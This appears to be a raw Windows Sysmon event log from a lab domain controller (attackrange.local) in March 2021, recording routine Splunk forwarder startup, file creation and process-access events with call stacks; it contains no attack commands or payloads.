23542300x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.355{266CAFBE-6481-6064-5800-00000000AE01}4000NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.299{266CAFBE-6481-6064-5800-00000000AE01}40003228C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.033{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.039{266CAFBE-6481-6064-5800-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.971{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 